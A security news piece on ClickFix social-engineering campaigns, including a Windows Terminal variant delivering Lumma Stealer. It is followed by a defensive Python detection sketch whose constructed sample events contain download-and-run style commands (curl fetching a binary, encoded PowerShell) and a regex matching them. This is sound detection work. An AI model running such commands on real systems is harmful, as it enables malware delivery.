Microsoft Threat Intelligence confirmed that ClickFix campaigns are now targeting thousands of enterprise and end-user devices globally every day. The social engineering technique tricks users into running malicious commands by impersonating error messages, CAPTCHA checks, or minor technical issues.
The February 2026 variant escalated the approach significantly: instead of instructing users to open the Windows Run dialog, it guides them to press Win+X then I to open Windows Terminal directly — a privileged command execution environment that blends into legitimate administrative workflows. The payload delivers the Lumma Stealer malware.
A separate campaign targets cryptocurrency and Web3 professionals through fake venture capital identities and spoofed video conferencing links on LinkedIn.
Staff awareness training should be updated to address ClickFix variants specifically: the Windows Terminal vector is new and effective, and traditional "don't click suspicious links" guidance does not cover it.
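For the Windows Terminal vector described above, training can be backed by a detection. The sketch below is an added example, not code from Microsoft or from the campaign reporting: it finds shells hosted by Windows Terminal, then flags child processes whose command line looks like download-and-run activity. It assumes process-creation events with Sysmon Event ID 1 field names and that the shell is logged as a child of `WindowsTerminal.exe`; the events, paths, the `example.invalid` URLs and the matching heuristic are constructed for illustration.

```python
import ntpath
import re

TERMINAL = "windowsterminal.exe"
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Assumed heuristic, not an indicator from the article: a remote URL or an
# encoded PowerShell command on the child's command line.
SUSPICIOUS = re.compile(r"https?://|\s-enc(odedcommand)?\s", re.IGNORECASE)

def exe(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()

def find_terminal_paste_execution(events):
    """Return suspicious children of shells that Windows Terminal hosts."""
    # Pass 1: interactive shells whose parent process is Windows Terminal.
    hosted = {e["ProcessGuid"] for e in events
              if exe(e["Image"]) in SHELLS and exe(e["ParentImage"]) == TERMINAL}
    # Pass 2: processes started from those shells that match the heuristic.
    return [e for e in events
            if e["ParentProcessGuid"] in hosted
            and SUSPICIOUS.search(e["CommandLine"])]

def ev(guid, parent_guid, image, parent_image, command_line):
    return {"ProcessGuid": guid, "ParentProcessGuid": parent_guid,
            "Image": image, "ParentImage": parent_image,
            "CommandLine": command_line}

WT = r"C:\Program Files\WindowsApps\Terminal\WindowsTerminal.exe"  # constructed path
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
CURL = r"C:\Windows\System32\curl.exe"

# Constructed events; field names follow Sysmon Event ID 1 (process creation).
EVENTS = [
    ev("P1", "P0", PS, WT, "powershell.exe"),          # shell tab in Terminal
    ev("P2", "P1", r"C:\Program Files\Git\cmd\git.exe", PS, "git.exe status"),
    ev("P3", "P1", CURL, PS, r"curl.exe -o C:\Temp\a.bin https://example.invalid/a.bin"),
    ev("P4", "P1", PS, PS, "powershell.exe -NoProfile -enc QQBCAEMA"),
    ev("P5", "E0", PS, EXPLORER, "powershell.exe"),    # shell not hosted by Terminal
    ev("P6", "P5", CURL, PS, "curl.exe https://example.invalid/b"),
]

if __name__ == "__main__":
    for hit in find_terminal_paste_execution(EVENTS):
        print(hit["ProcessGuid"], hit["CommandLine"])
```

A command pasted into an already open shell runs inside that process, so process-creation logs only show the children it starts; PowerShell script block logging (Event ID 4104) records the pasted text itself.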